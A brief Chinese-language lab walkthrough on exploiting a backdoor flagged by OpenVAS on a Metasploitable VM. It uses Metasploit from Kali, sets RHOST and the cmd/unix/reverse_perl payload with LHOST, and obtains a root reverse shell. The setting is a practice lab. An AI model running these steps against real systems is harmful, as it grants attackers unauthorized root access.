在使用openvas对meta虚拟机进行漏洞测试时,发现高危漏洞
是一个CVSS:7.5的后门,现尝试实现
攻击机:kali linux ip:192.168.204.128
靶机:Metasploittable ip:192.168.204.130
首先在kali中启动msfconsole
搜索漏洞库
使用漏洞(这里也可以直接输入use 2)
设置参数
通过set RHOST命令锁定靶机IP
这里直接run的话会报错:A payload has not been selected
Exploit completed,but no session was created.
经过多次尝试找到错误原因,这里我们手动设置payload
set payload cmd/unix/reverse_perl
再设置LHost
最后run,显示成功连接,输入whoami,显示root
后门实现完成